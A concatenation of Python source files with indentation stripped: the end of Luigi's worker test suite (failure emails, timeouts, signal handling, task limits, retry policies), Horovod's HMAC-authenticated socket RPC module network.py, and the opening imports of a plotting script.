a = A()
self.assertEqual(emails, [])
self.worker.add(a)
self.assertTrue(emails[0].find("Luigi: %s failed scheduling" % (a,)) != -1)
self.worker.run()
self.assertFalse(a.has_run)
@with_config({'batch_email': {'email_interval': '0'}, 'worker': {'send_failure_email': 'False'}})
@email_patch
def test_requires_error_email_batch(self, emails):
class A(DummyTask):
def requires(self):
raise Exception("b0rk")
scheduler = Scheduler(batch_emails=True)
worker = Worker(scheduler)
a = A()
self.assertEqual(emails, [])
worker.add(a)
self.assertEqual(emails, [])
worker.run()
self.assertFalse(a.has_run)
scheduler.prune()
self.assertTrue("1 scheduling failure" in emails[0])
@email_patch
def test_complete_return_value(self, emails):
class A(DummyTask):
def complete(self):
pass # no return value should be an error
a = A()
self.assertEqual(emails, [])
self.worker.add(a)
self.assertTrue(emails[0].find("Luigi: %s failed scheduling" % (a,)) != -1)
self.worker.run()
self.assertTrue(emails[0].find("Luigi: %s failed scheduling" % (a,)) != -1)
self.assertFalse(a.has_run)
@with_config({'batch_email': {'email_interval': '0'}, 'worker': {'send_failure_email': 'False'}})
@email_patch
def test_complete_return_value_email_batch(self, emails):
class A(DummyTask):
def complete(self):
pass # no return value should be an error
scheduler = Scheduler(batch_emails=True)
worker = Worker(scheduler)
a = A()
self.assertEqual(emails, [])
worker.add(a)
self.assertEqual(emails, [])
self.worker.run()
self.assertEqual(emails, [])
self.assertFalse(a.has_run)
scheduler.prune()
self.assertTrue("1 scheduling failure" in emails[0])
@email_patch
def test_run_error(self, emails):
class A(luigi.Task):
def run(self):
raise Exception("b0rk")
a = A()
luigi.build([a], workers=1, local_scheduler=True)
self.assertEqual(1, len(emails))
self.assertTrue(emails[0].find("Luigi: %s FAILED" % (a,)) != -1)
@with_config({'batch_email': {'email_interval': '0'}, 'worker': {'send_failure_email': 'False'}})
@email_patch
def test_run_error_email_batch(self, emails):
class A(luigi.Task):
owner_email = ['a@test.com', 'b@test.com']
def run(self):
raise Exception("b0rk")
scheduler = Scheduler(batch_emails=True)
worker = Worker(scheduler)
worker.add(A())
worker.run()
scheduler.prune()
self.assertEqual(3, len(emails))
self.assertTrue(any('a@test.com' in email for email in emails))
self.assertTrue(any('b@test.com' in email for email in emails))
@with_config({'batch_email': {'email_interval': '0'}, 'worker': {'send_failure_email': 'False'}})
@email_patch
def test_run_error_batch_email_string(self, emails):
class A(luigi.Task):
owner_email = 'a@test.com'
def run(self):
raise Exception("b0rk")
scheduler = Scheduler(batch_emails=True)
worker = Worker(scheduler)
worker.add(A())
worker.run()
scheduler.prune()
self.assertEqual(2, len(emails))
self.assertTrue(any('a@test.com' in email for email in emails))
@with_config({'worker': {'send_failure_email': 'False'}})
@email_patch
def test_run_error_no_email(self, emails):
class A(luigi.Task):
def run(self):
raise Exception("b0rk")
luigi.build([A()], workers=1, local_scheduler=True)
self.assertFalse(emails)
@staticmethod
def read_email(email_msg):
subject_obj, body_obj = email.parser.Parser().parsestr(email_msg).walk()
return str(subject_obj['Subject']), str(body_obj.get_payload(decode=True))
@email_patch
def test_task_process_dies_with_email(self, emails):
a = SendSignalTask(signal.SIGKILL)
luigi.build([a], workers=2, local_scheduler=True)
self.assertEqual(1, len(emails))
subject, body = self.read_email(emails[0])
self.assertIn("Luigi: {} FAILED".format(a), subject)
self.assertIn("died unexpectedly with exit code -9", body)
@with_config({'worker': {'send_failure_email': 'False'}})
@email_patch
def test_task_process_dies_no_email(self, emails):
luigi.build([SendSignalTask(signal.SIGKILL)], workers=2, local_scheduler=True)
self.assertEqual([], emails)
@email_patch
def test_task_times_out(self, emails):
class A(luigi.Task):
worker_timeout = 0.0001
def run(self):
time.sleep(5)
a = A()
luigi.build([a], workers=2, local_scheduler=True)
self.assertEqual(1, len(emails))
subject, body = self.read_email(emails[0])
self.assertIn("Luigi: %s FAILED" % (a,), subject)
self.assertIn("timed out after 0.0001 seconds and was terminated.", body)
@with_config({'worker': {'send_failure_email': 'False'}})
@email_patch
def test_task_times_out_no_email(self, emails):
class A(luigi.Task):
worker_timeout = 0.0001
def run(self):
time.sleep(5)
luigi.build([A()], workers=2, local_scheduler=True)
self.assertEqual([], emails)
@with_config(dict(worker=dict(retry_external_tasks='true')))
@email_patch
def test_external_task_retries(self, emails):
"""
Test that we do not send error emails on the failures of external tasks
"""
class A(luigi.ExternalTask):
pass
a = A()
luigi.build([a], workers=2, local_scheduler=True)
self.assertEqual(emails, [])
@email_patch
def test_no_error(self, emails):
class A(DummyTask):
pass
a = A()
self.assertEqual(emails, [])
self.worker.add(a)
self.assertEqual(emails, [])
self.worker.run()
self.assertEqual(emails, [])
self.assertTrue(a.complete())
@custom_email_patch({"email": {"receiver": "not-a-real-email-address-for-test-only", 'format': 'none'}})
def test_disable_emails(self, emails):
class A(luigi.Task):
def complete(self):
raise Exception("b0rk")
self.worker.add(A())
self.assertEqual(emails, [])
class RaiseSystemExit(luigi.Task):
def run(self):
raise SystemExit("System exit!!")
class SendSignalTask(luigi.Task):
signal = luigi.IntParameter()
def run(self):
os.kill(os.getpid(), self.signal)
class HangTheWorkerTask(luigi.Task):
worker_timeout = luigi.IntParameter(default=None)
def run(self):
while True:
pass
def complete(self):
return False
class MultipleWorkersTest(unittest.TestCase):
@unittest.skip('Always skip. There are many intermittent failures')
# This pass under python3 when run as `nosetests test/worker_test.py`
# but not as `nosetests test`. Probably some side effect on previous tests
@unittest.skipIf(six.PY3, 'This test fail on python3 when run with tox.')
def test_multiple_workers(self):
# Test using multiple workers
# Also test generating classes dynamically since this may reflect issues with
# various platform and how multiprocessing is implemented. If it's using os.fork
# under the hood it should be fine, but dynamic classses can't be pickled, so
# other implementations of multiprocessing (using spawn etc) may fail
class MyDynamicTask(luigi.Task):
x = luigi.Parameter()
def run(self):
time.sleep(0.1)
t0 = time.time()
luigi.build([MyDynamicTask(i) for i in range(100)], workers=100, local_scheduler=True)
self.assertTrue(time.time() < t0 + 5.0) # should ideally take exactly 0.1s, but definitely less than 10.0
def test_zero_workers(self):
d = DummyTask()
luigi.build([d], workers=0, local_scheduler=True)
self.assertFalse(d.complete())
def test_system_exit(self):
# This would hang indefinitely before this fix:
# https://github.com/spotify/luigi/pull/439
luigi.build([RaiseSystemExit()], workers=2, local_scheduler=True)
def test_term_worker(self):
luigi.build([SendSignalTask(signal.SIGTERM)], workers=2, local_scheduler=True)
def test_kill_worker(self):
luigi.build([SendSignalTask(signal.SIGKILL)], workers=2, local_scheduler=True)
def test_purge_multiple_workers(self):
w = Worker(worker_processes=2, wait_interval=0.01)
t1 = SendSignalTask(signal.SIGTERM)
t2 = SendSignalTask(signal.SIGKILL)
w.add(t1)
w.add(t2)
w._run_task(t1.task_id)
w._run_task(t2.task_id)
time.sleep(1.0)
w._handle_next_task()
w._handle_next_task()
w._handle_next_task()
def test_stop_worker_kills_subprocesses(self):
with Worker(worker_processes=2) as w:
hung_task = HangTheWorkerTask()
w.add(hung_task)
w._run_task(hung_task.task_id)
pids = [p.pid for p in w._running_tasks.values()]
self.assertEqual(1, len(pids))
pid = pids[0]
def is_running():
return pid in {p.pid for p in psutil.Process().children()}
self.assertTrue(is_running())
self.assertFalse(is_running())
@mock.patch('luigi.worker.time')
def test_no_process_leak_from_repeatedly_running_same_task(self, worker_time):
with Worker(worker_processes=2) as w:
hung_task = HangTheWorkerTask()
w.add(hung_task)
w._run_task(hung_task.task_id)
children = set(psutil.Process().children())
# repeatedly try to run the same task id
for _ in range(10):
worker_time.sleep.reset_mock()
w._run_task(hung_task.task_id)
# should sleep after each attempt
worker_time.sleep.assert_called_once_with(mock.ANY)
# only one process should be running
self.assertEqual(children, set(psutil.Process().children()))
def test_time_out_hung_worker(self):
luigi.build([HangTheWorkerTask(0.1)], workers=2, local_scheduler=True)
def test_time_out_hung_single_worker(self):
luigi.build([HangTheWorkerTask(0.1)], workers=1, local_scheduler=True)
@skipOnTravis('https://travis-ci.org/spotify/luigi/jobs/72953986')
@mock.patch('luigi.worker.time')
def test_purge_hung_worker_default_timeout_time(self, mock_time):
w = Worker(worker_processes=2, wait_interval=0.01, timeout=5)
mock_time.time.return_value = 0
task = HangTheWorkerTask()
w.add(task)
w._run_task(task.task_id)
mock_time.time.return_value = 5
w._handle_next_task()
self.assertEqual(1, len(w._running_tasks))
mock_time.time.return_value = 6
w._handle_next_task()
self.assertEqual(0, len(w._running_tasks))
@skipOnTravis('https://travis-ci.org/spotify/luigi/jobs/76645264')
@mock.patch('luigi.worker.time')
def test_purge_hung_worker_override_timeout_time(self, mock_time):
w = Worker(worker_processes=2, wait_interval=0.01, timeout=5)
mock_time.time.return_value = 0
task = HangTheWorkerTask(worker_timeout=10)
w.add(task)
w._run_task(task.task_id)
mock_time.time.return_value = 10
w._handle_next_task()
self.assertEqual(1, len(w._running_tasks))
mock_time.time.return_value = 11
w._handle_next_task()
self.assertEqual(0, len(w._running_tasks))
class Dummy2Task(Task):
p = luigi.Parameter()
def output(self):
return MockTarget(self.p)
def run(self):
f = self.output().open('w')
f.write('test')
f.close()
class AssistantTest(unittest.TestCase):
def run(self, result=None):
self.sch = Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
self.assistant = Worker(scheduler=self.sch, worker_id='Y', assistant=True)
with Worker(scheduler=self.sch, worker_id='X') as w:
self.w = w
super(AssistantTest, self).run(result)
def test_get_work(self):
d = Dummy2Task('123')
self.w.add(d)
self.assertFalse(d.complete())
self.assistant.run()
self.assertTrue(d.complete())
def test_bad_job_type(self):
class Dummy3Task(Dummy2Task):
task_family = 'UnknownTaskFamily'
d = Dummy3Task('123')
self.w.add(d)
self.assertFalse(d.complete())
self.assertFalse(self.assistant.run())
self.assertFalse(d.complete())
self.assertEqual(list(self.sch.task_list('FAILED', '').keys()), [d.task_id])
def test_unimported_job_type(self):
MODULE_CONTENTS = b'''
import luigi
class UnimportedTask(luigi.Task):
def complete(self):
return False
'''
reg = luigi.task_register.Register._get_reg()
class UnimportedTask(luigi.Task):
task_module = None # Set it here, so it's generally settable
luigi.task_register.Register._set_reg(reg)
task = UnimportedTask()
# verify that it can't run the task without the module info necessary to import it
self.w.add(task)
self.assertFalse(self.assistant.run())
self.assertEqual(list(self.sch.task_list('FAILED', '').keys()), [task.task_id])
# check that it can import with the right module
with temporary_unloaded_module(MODULE_CONTENTS) as task.task_module:
self.w.add(task)
self.assertTrue(self.assistant.run())
self.assertEqual(list(self.sch.task_list('DONE', '').keys()), [task.task_id])
def test_unimported_job_sends_failure_message(self):
class NotInAssistantTask(luigi.Task):
task_family = 'Unknown'
task_module = None
task = NotInAssistantTask()
self.w.add(task)
self.assertFalse(self.assistant.run())
self.assertEqual(list(self.sch.task_list('FAILED', '').keys()), [task.task_id])
self.assertTrue(self.sch.fetch_error(task.task_id)['error'])
class ForkBombTask(luigi.Task):
depth = luigi.IntParameter()
breadth = luigi.IntParameter()
p = luigi.Parameter(default=(0, )) # ehm for some weird reason [0] becomes a tuple...?
def output(self):
return MockTarget('.'.join(map(str, self.p)))
def run(self):
with self.output().open('w') as f:
f.write('Done!')
def requires(self):
if len(self.p) < self.depth:
for i in range(self.breadth):
yield ForkBombTask(self.depth, self.breadth, self.p + (i, ))
class TaskLimitTest(unittest.TestCase):
def tearDown(self):
MockFileSystem().remove('')
@with_config({'worker': {'task_limit': '6'}})
def test_task_limit_exceeded(self):
w = Worker()
t = ForkBombTask(3, 2)
w.add(t)
w.run()
self.assertFalse(t.complete())
leaf_tasks = [ForkBombTask(3, 2, branch) for branch in [(0, 0, 0), (0, 0, 1), (0, 1, 0), (0, 1, 1)]]
self.assertEqual(3, sum(t.complete() for t in leaf_tasks),
"should have gracefully completed as much as possible even though the single last leaf didn't get scheduled")
@with_config({'worker': {'task_limit': '7'}})
def test_task_limit_not_exceeded(self):
w = Worker()
t = ForkBombTask(3, 2)
w.add(t)
w.run()
self.assertTrue(t.complete())
def test_no_task_limit(self):
w = Worker()
t = ForkBombTask(4, 2)
w.add(t)
w.run()
self.assertTrue(t.complete())
class WorkerConfigurationTest(unittest.TestCase):
def test_asserts_for_worker(self):
"""
Test that Worker() asserts that it's sanely configured
"""
Worker(wait_interval=1) # This shouldn't raise
self.assertRaises(AssertionError, Worker, wait_interval=0)
class WorkerWaitJitterTest(unittest.TestCase):
@with_config({'worker': {'wait_jitter': '10.0'}})
@mock.patch("random.uniform")
@mock.patch("time.sleep")
def test_wait_jitter(self, mock_sleep, mock_random):
""" verify configured jitter amount """
mock_random.return_value = 1.0
w = Worker()
x = w._sleeper()
six.next(x)
mock_random.assert_called_with(0, 10.0)
mock_sleep.assert_called_with(2.0)
mock_random.return_value = 2.0
six.next(x)
mock_random.assert_called_with(0, 10.0)
mock_sleep.assert_called_with(3.0)
@mock.patch("random.uniform")
@mock.patch("time.sleep")
def test_wait_jitter_default(self, mock_sleep, mock_random):
""" verify default jitter is as expected """
mock_random.return_value = 1.0
w = Worker()
x = w._sleeper()
six.next(x)
mock_random.assert_called_with(0, 5.0)
mock_sleep.assert_called_with(2.0)
mock_random.return_value = 3.3
six.next(x)
mock_random.assert_called_with(0, 5.0)
mock_sleep.assert_called_with(4.3)
class KeyboardInterruptBehaviorTest(LuigiTestCase):
def test_propagation_when_executing(self):
"""
Ensure that keyboard interrupts causes luigi to quit when you are
executing tasks.
TODO: Add a test that tests the multiprocessing (--worker >1) case
"""
class KeyboardInterruptTask(luigi.Task):
def run(self):
raise KeyboardInterrupt()
cmd = 'KeyboardInterruptTask --local-scheduler --no-lock'.split(' ')
self.assertRaises(KeyboardInterrupt, luigi_run, cmd)
def test_propagation_when_scheduling(self):
"""
Test that KeyboardInterrupt causes luigi to quit while scheduling.
"""
class KeyboardInterruptTask(luigi.Task):
def complete(self):
raise KeyboardInterrupt()
class ExternalKeyboardInterruptTask(luigi.ExternalTask):
def complete(self):
raise KeyboardInterrupt()
self.assertRaises(KeyboardInterrupt, luigi_run,
['KeyboardInterruptTask', '--local-scheduler', '--no-lock'])
self.assertRaises(KeyboardInterrupt, luigi_run,
['ExternalKeyboardInterruptTask', '--local-scheduler', '--no-lock'])
class WorkerPurgeEventHandlerTest(unittest.TestCase):
@mock.patch('luigi.worker.ContextManagedTaskProcess')
def test_process_killed_handler(self, task_proc):
result = []
@HangTheWorkerTask.event_handler(Event.PROCESS_FAILURE)
def store_task(t, error_msg):
self.assertTrue(error_msg)
result.append(t)
w = Worker()
task = HangTheWorkerTask()
task_process = mock.MagicMock(is_alive=lambda: False, exitcode=-14, task=task)
task_proc.return_value = task_process
w.add(task)
w._run_task(task.task_id)
w._handle_next_task()
self.assertEqual(result, [task])
@mock.patch('luigi.worker.time')
def test_timeout_handler(self, mock_time):
result = []
@HangTheWorkerTask.event_handler(Event.TIMEOUT)
def store_task(t, error_msg):
self.assertTrue(error_msg)
result.append(t)
w = Worker(worker_processes=2, wait_interval=0.01, timeout=5)
mock_time.time.return_value = 0
task = HangTheWorkerTask(worker_timeout=1)
w.add(task)
w._run_task(task.task_id)
mock_time.time.return_value = 3
w._handle_next_task()
self.assertEqual(result, [task])
class PerTaskRetryPolicyBehaviorTest(LuigiTestCase):
def setUp(self):
super(PerTaskRetryPolicyBehaviorTest, self).setUp()
self.per_task_retry_count = 3
self.default_retry_count = 1
self.sch = Scheduler(retry_delay=0.1, retry_count=self.default_retry_count, prune_on_get_work=True)
def test_with_all_disabled_with_single_worker(self):
"""
With this test, a case which has a task (TestWrapperTask), requires two another tasks (TestErrorTask1,TestErrorTask1) which both is failed, is
tested.
Task TestErrorTask1 has default retry_count which is 1, but Task TestErrorTask2 has retry_count at task level as 2.
This test is running on single worker
"""
class TestErrorTask1(DummyErrorTask):
pass
e1 = TestErrorTask1()
class TestErrorTask2(DummyErrorTask):
retry_count = self.per_task_retry_count
e2 = TestErrorTask2()
class TestWrapperTask(luigi.WrapperTask):
def requires(self):
return [e2, e1]
wt = TestWrapperTask()
with Worker(scheduler=self.sch, worker_id='X', keep_alive=True, wait_interval=0.1, wait_jitter=0.05) as w1:
self.assertTrue(w1.add(wt))
self.assertFalse(w1.run())
self.assertEqual([wt.task_id], list(self.sch.task_list('PENDING', 'UPSTREAM_DISABLED').keys()))
self.assertEqual(sorted([e1.task_id, e2.task_id]), sorted(self.sch.task_list('DISABLED', '').keys()))
self.assertEqual(0, self.sch._state.get_task(wt.task_id).failures.num_failures())
self.assertEqual(self.per_task_retry_count, self.sch._state.get_task(e2.task_id).failures.num_failures())
self.assertEqual(self.default_retry_count, self.sch._state.get_task(e1.task_id).failures.num_failures())
def test_with_all_disabled_with_multiple_worker(self):
"""
With this test, a case which has a task (TestWrapperTask), requires two another tasks (TestErrorTask1,TestErrorTask1) which both is failed, is
tested.
Task TestErrorTask1 has default retry_count which is 1, but Task TestErrorTask2 has retry_count at task level as 2.
This test is running on multiple worker
"""
class TestErrorTask1(DummyErrorTask):
pass
e1 = TestErrorTask1()
class TestErrorTask2(DummyErrorTask):
retry_count = self.per_task_retry_count
e2 = TestErrorTask2()
class TestWrapperTask(luigi.WrapperTask):
def requires(self):
return [e2, e1]
wt = TestWrapperTask()
with Worker(scheduler=self.sch, worker_id='X', keep_alive=True, wait_interval=0.1, wait_jitter=0.05) as w1:
with Worker(scheduler=self.sch, worker_id='Y', keep_alive=True, wait_interval=0.1, wait_jitter=0.05) as w2:
with Worker(scheduler=self.sch, worker_id='Z', keep_alive=True, wait_interval=0.1, wait_jitter=0.05) as w3:
self.assertTrue(w1.add(wt))
self.assertTrue(w2.add(e2))
self.assertTrue(w3.add(e1))
self.assertFalse(w3.run())
self.assertFalse(w2.run())
self.assertTrue(w1.run())
self.assertEqual([wt.task_id], list(self.sch.task_list('PENDING', 'UPSTREAM_DISABLED').keys()))
self.assertEqual(sorted([e1.task_id, e2.task_id]), sorted(self.sch.task_list('DISABLED', '').keys()))
self.assertEqual(0, self.sch._state.get_task(wt.task_id).failures.num_failures())
self.assertEqual(self.per_task_retry_count, self.sch._state.get_task(e2.task_id).failures.num_failures())
self.assertEqual(self.default_retry_count, self.sch._state.get_task(e1.task_id).failures.num_failures())
def test_with_includes_success_with_single_worker(self):
"""
With this test, a case which has a task (TestWrapperTask), requires one (TestErrorTask1) FAILED and one (TestSuccessTask1) SUCCESS, is tested.
Task TestSuccessTask1 will be DONE successfully, but Task TestErrorTask1 will be failed and it has retry_count at task level as 2.
This test is running on single worker
"""
class TestSuccessTask1(DummyTask):
pass
s1 = TestSuccessTask1()
class TestErrorTask1(DummyErrorTask):
retry_count = self.per_task_retry_count
e1 = TestErrorTask1()
class TestWrapperTask(luigi.WrapperTask):
def requires(self):
return [e1, s1]
wt = TestWrapperTask()
with Worker(scheduler=self.sch, worker_id='X', keep_alive=True, wait_interval=0.1, wait_jitter=0.05) as w1:
self.assertTrue(w1.add(wt))
self.assertFalse(w1.run())
self.assertEqual([wt.task_id], list(self.sch.task_list('PENDING', 'UPSTREAM_DISABLED').keys()))
self.assertEqual([e1.task_id], list(self.sch.task_list('DISABLED', '').keys()))
self.assertEqual([s1.task_id], list(self.sch.task_list('DONE', '').keys()))
self.assertEqual(0, self.sch._state.get_task(wt.task_id).failures.num_failures())
self.assertEqual(self.per_task_retry_count, self.sch._state.get_task(e1.task_id).failures.num_failures())
self.assertEqual(0, self.sch._state.get_task(s1.task_id).failures.num_failures())
def test_with_includes_success_with_multiple_worker(self):
"""
With this test, a case which has a task (TestWrapperTask), requires one (TestErrorTask1) FAILED and one (TestSuccessTask1) SUCCESS, is tested.
Task TestSuccessTask1 will be DONE successfully, but Task TestErrorTask1 will be failed and it has retry_count at task level as 2.
This test is running on multiple worker
"""
class TestSuccessTask1(DummyTask):
pass
s1 = TestSuccessTask1()
class TestErrorTask1(DummyErrorTask):
retry_count = self.per_task_retry_count
e1 = TestErrorTask1()
class TestWrapperTask(luigi.WrapperTask):
def requires(self):
return [e1, s1]
wt = TestWrapperTask()
with Worker(scheduler=self.sch, worker_id='X', keep_alive=True, wait_interval=0.1, wait_jitter=0.05) as w1:
with Worker(scheduler=self.sch, worker_id='Y', keep_alive=True, wait_interval=0.1, wait_jitter=0.05) as w2:
with Worker(scheduler=self.sch, worker_id='Z', keep_alive=True, wait_interval=0.1, wait_jitter=0.05) as w3:
self.assertTrue(w1.add(wt))
self.assertTrue(w2.add(e1))
self.assertTrue(w3.add(s1))
self.assertTrue(w3.run())
self.assertFalse(w2.run())
self.assertTrue(w1.run())
self.assertEqual([wt.task_id], list(self.sch.task_list('PENDING', 'UPSTREAM_DISABLED').keys()))
self.assertEqual([e1.task_id], list(self.sch.task_list('DISABLED', '').keys()))
self.assertEqual([s1.task_id], list(self.sch.task_list('DONE', '').keys()))
self.assertEqual(0, self.sch._state.get_task(wt.task_id).failures.num_failures())
self.assertEqual(self.per_task_retry_count, self.sch._state.get_task(e1.task_id).failures.num_failures())
self.assertEqual(0, self.sch._state.get_task(s1.task_id).failures.num_failures())
def test_with_dynamic_dependencies_with_single_worker(self):
"""
With this test, a case includes dependency tasks(TestErrorTask1,TestErrorTask2) which both are failed.
Task TestErrorTask1 has default retry_count which is 1, but Task TestErrorTask2 has retry_count at task level as 2.
This test is running on single worker
"""
class TestErrorTask1(DummyErrorTask):
pass
e1 = TestErrorTask1()
class TestErrorTask2(DummyErrorTask):
retry_count = self.per_task_retry_count
e2 = TestErrorTask2()
class TestSuccessTask1(DummyTask):
pass
s1 = TestSuccessTask1()
class TestWrapperTask(DummyTask):
def requires(self):
return [s1]
def run(self):
super(TestWrapperTask, self).run()
yield e2, e1
wt = TestWrapperTask()
with Worker(scheduler=self.sch, worker_id='X', keep_alive=True, wait_interval=0.1, wait_jitter=0.05) as w1:
self.assertTrue(w1.add(wt))
self.assertFalse(w1.run())
self.assertEqual([wt.task_id], list(self.sch.task_list('PENDING', 'UPSTREAM_DISABLED').keys()))
self.assertEqual(sorted([e1.task_id, e2.task_id]), sorted(self.sch.task_list('DISABLED', '').keys()))
self.assertEqual(0, self.sch._state.get_task(wt.task_id).failures.num_failures())
self.assertEqual(0, self.sch._state.get_task(s1.task_id).failures.num_failures())
self.assertEqual(self.per_task_retry_count, self.sch._state.get_task(e2.task_id).failures.num_failures())
self.assertEqual(self.default_retry_count, self.sch._state.get_task(e1.task_id).failures.num_failures())
def test_with_dynamic_dependencies_with_multiple_workers(self):
"""
With this test, a case includes dependency tasks(TestErrorTask1,TestErrorTask2) which both are failed.
Task TestErrorTask1 has default retry_count which is 1, but Task TestErrorTask2 has retry_count at task level as 2.
This test is running on multiple worker
"""
class TestErrorTask1(DummyErrorTask):
pass
e1 = TestErrorTask1()
class TestErrorTask2(DummyErrorTask):
retry_count = self.per_task_retry_count
e2 = TestErrorTask2()
class TestSuccessTask1(DummyTask):
pass
s1 = TestSuccessTask1()
class TestWrapperTask(DummyTask):
def requires(self):
return [s1]
def run(self):
super(TestWrapperTask, self).run()
yield e2, e1
wt = TestWrapperTask()
with Worker(scheduler=self.sch, worker_id='X', keep_alive=True, wait_interval=0.1, wait_jitter=0.05) as w1:
with Worker(scheduler=self.sch, worker_id='Y', keep_alive=True, wait_interval=0.1, wait_jitter=0.05) as w2:
self.assertTrue(w1.add(wt))
self.assertTrue(w2.add(s1))
self.assertTrue(w2.run())
self.assertFalse(w1.run())
self.assertEqual([wt.task_id], list(self.sch.task_list('PENDING', 'UPSTREAM_DISABLED').keys()))
self.assertEqual(sorted([e1.task_id, e2.task_id]), sorted(self.sch.task_list('DISABLED', '').keys()))
self.assertEqual(0, self.sch._state.get_task(wt.task_id).failures.num_failures())
self.assertEqual(0, self.sch._state.get_task(s1.task_id).failures.num_failures())
self.assertEqual(self.per_task_retry_count, self.sch._state.get_task(e2.task_id).failures.num_failures())
self.assertEqual(self.default_retry_count, self.sch._state.get_task(e1.task_id).failures.num_failures())
|
network.py | # Copyright 2019 Uber Technologies, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import random
import socket
import struct
import threading
import cloudpickle
import psutil
from six.moves import queue, socketserver
from horovod.run.common.util import secret
class PingRequest(object):
pass
class NoValidAddressesFound(Exception):
pass
class PingResponse(object):
def __init__(self, service_name, source_address):
self.service_name = service_name
"""Service name that responded to this ping."""
self.source_address = source_address
"""Source IP address that was visible to the service."""
class AckResponse(object):
"""Used for situations when the response does not carry any data."""
pass
class Wire(object):
"""
Used for serialization/deserialization of objects over the wire.
We use HMAC to protect services from unauthorized use. The key used for
the HMAC digest is distributed by Open MPI and Spark.
The objects are serialized using cloudpickle. Serialized objects become
the body of the message.
Structure of the message is as follows:
- HMAC digest of the body (32 bytes)
- length of the body (4 bytes)
- body
"""
def __init__(self, key):
self._key = key
def write(self, obj, wfile):
message = cloudpickle.dumps(obj)
digest = secret.compute_digest(self._key, message)
wfile.write(digest)
# Pack message length into 4-byte integer.
wfile.write(struct.pack('i', len(message)))
wfile.write(message)
wfile.flush()
def read(self, rfile):
digest = rfile.read(secret.DIGEST_LENGTH)
# Unpack message length into 4-byte integer.
message_len = struct.unpack('i', rfile.read(4))[0]
message = rfile.read(message_len)
if not secret.check_digest(self._key, message, digest):
raise Exception('Security error: digest did not match the message.')
return cloudpickle.loads(message)
class BasicService(object):
def __init__(self, service_name, key):
self._service_name = service_name
self._wire = Wire(key)
self._server = self._make_server()
self._port = self._server.socket.getsockname()[1]
self._thread = threading.Thread(target=self._server.serve_forever)
self._thread.daemon = True
self._thread.start()
def _make_server(self):
min_port = 1024
max_port = 65536
num_ports = max_port - min_port
start_port = random.randrange(0, num_ports)
for port_offset in range(num_ports):
try:
port = min_port + (start_port + port_offset) % num_ports
return socketserver.ThreadingTCPServer(('0.0.0.0', port), self._make_handler())
except:
pass
raise Exception('Unable to find a port to bind to.')
def _make_handler(self):
server = self
class _Handler(socketserver.StreamRequestHandler):
def handle(self):
try:
req = server._wire.read(self.rfile)
resp = server._handle(req, self.client_address)
if not resp:
raise Exception('Handler did not return a response.')
server._wire.write(resp, self.wfile)
except EOFError:
# Happens when client is abruptly terminated, don't want to pollute the logs.
pass
return _Handler
def _handle(self, req, client_address):
if isinstance(req, PingRequest):
return PingResponse(self._service_name, client_address[0])
raise NotImplementedError(req)
def addresses(self):
result = {}
for intf, intf_addresses in psutil.net_if_addrs().items():
for addr in intf_addresses:
if addr.family == socket.AF_INET:
if intf not in result:
result[intf] = []
result[intf].append((addr.address, self._port))
return result
def shutdown(self):
self._server.shutdown()
self._server.server_close()
self._thread.join()
def get_port(self):
return self._port
class BasicClient(object):
def __init__(self, service_name, addresses, key, verbose, match_intf=False,
probe_timeout=20, retries=3):
# Note: because of retry logic, ALL RPC calls are REQUIRED to be idempotent.
self._verbose = verbose
self._service_name = service_name
self._wire = Wire(key)
self._match_intf = match_intf
self._probe_timeout = probe_timeout
self._retries = retries
self._addresses = self._probe(addresses)
if not self._addresses:
raise NoValidAddressesFound(
'Horovodrun was unable to connect to {service_name} on any '
'of the following addresses: {addresses}.\n\n'
'One possible cause of this problem is that '
'horovodrun currently requires every host to have at '
'least one routable network interface with the same '
'name across all of the hosts. '
'You can run \"ifconfig -a\" '
'on every host and check for the common '
'routable interface. '
'To fix the problem, you can rename interfaces on '
'Linux.'.format(service_name=service_name, addresses=addresses))
def _probe(self, addresses):
result_queue = queue.Queue()
threads = []
for intf, intf_addresses in addresses.items():
for addr in intf_addresses:
thread = threading.Thread(target=self._probe_one,
args=(intf, addr, result_queue))
thread.daemon = True
thread.start()
threads.append(thread)
for t in threads:
t.join()
result = {}
while not result_queue.empty():
intf, addr = result_queue.get()
if intf not in result:
result[intf] = []
result[intf].append(addr)
return result
def _probe_one(self, intf, addr, result_queue):
for iter in range(self._retries):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(self._probe_timeout)
try:
sock.connect(addr)
rfile = sock.makefile('rb')
wfile = sock.makefile('wb')
try:
self._wire.write(PingRequest(), wfile)
resp = self._wire.read(rfile)
if resp.service_name != self._service_name:
return
if self._match_intf:
# Interface name of destination and source must match
# since `match_intf` is requested.
client_intf_addrs = [x.address
for x in psutil.net_if_addrs().get(intf, [])
if x.family == socket.AF_INET]
if resp.source_address not in client_intf_addrs:
if self._verbose >= 2:
# Need to find the local interface name whose
# address was visible to the target host's server.
resp_intf = ''
for key in psutil.net_if_addrs().keys():
key_intf_addrs = [x.address
for x in psutil.net_if_addrs().get(key, [])]
if resp.source_address in key_intf_addrs:
resp_intf = key
break
print('WARNING: Expected to connect the host '
'{addr} using interface '
'{intf}, but reached it on interface '
'{resp_intf}.'.format(
addr=str(addr[0])+':'+str(addr[1]),
intf=intf,
resp_intf=resp_intf))
return
result_queue.put((intf, addr))
return
finally:
rfile.close()
wfile.close()
except:
pass
finally:
sock.close()
def _send_one(self, addr, req):
for iter in range(self._retries):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect(addr)
rfile = sock.makefile('rb')
wfile = sock.makefile('wb')
try:
self._wire.write(req, wfile)
resp = self._wire.read(rfile)
return resp
finally:
rfile.close()
wfile.close()
except:
if iter == self._retries - 1:
# Raise exception on the last retry.
raise
finally:
sock.close()
def _send(self, req):
# Since all the addresses were vetted, use the first one.
addr = list(self._addresses.values())[0][0]
return self._send_one(addr, req)
def addresses(self):
return self._addresses
|
plot.py | import multiprocessing as mp
from copy import copy
import numpy as np
import tkinter
import pickle
import os
from itertools import accumulate
from matplotlib import pyplot as plt, lines
from casadi import Callback, nlpsol_out, nlpsol_n_out, Sparsity
